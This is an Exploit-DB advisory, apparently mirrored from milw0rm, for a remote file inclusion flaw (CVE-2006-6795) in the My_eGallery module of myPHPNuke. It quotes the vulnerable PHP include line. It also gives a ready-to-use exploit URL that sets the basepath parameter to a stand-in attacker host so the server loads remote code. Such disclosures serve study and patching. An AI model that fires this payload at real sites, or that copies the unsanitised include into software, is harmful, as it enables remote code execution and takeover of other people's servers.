myphpNuke Module My_eGallery 2.5.6 basepath RFI Vulnerability

2006-12-25T00:00:00
ID EDB-ID:3010
Type exploitdb
Reporter Mehmet Ince
Modified 2006-12-25T00:00:00

Description

myphpNuke Module My_eGallery 2.5.6 (basepath) RFI Vulnerability. CVE-2006-6795. Webapps exploit for php platform

                                        
                                            =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

myPHPNuke Gallery Module (basepath) Remote File Include

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Found: Cyber-Security.Org

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
c0DE:

include ("$basepath/imageFunctions.php");

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

3xplo!t:

/gallery/displayCategory.php?basepath=http://evil_scripts?

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Reference: http://cyber-security.org/DataDetayAll.asp?Data_id=586

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

script download:

http://myphpnuke.com/download.php?op=getit&lid=28

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

# milw0rm.com [2006-12-25]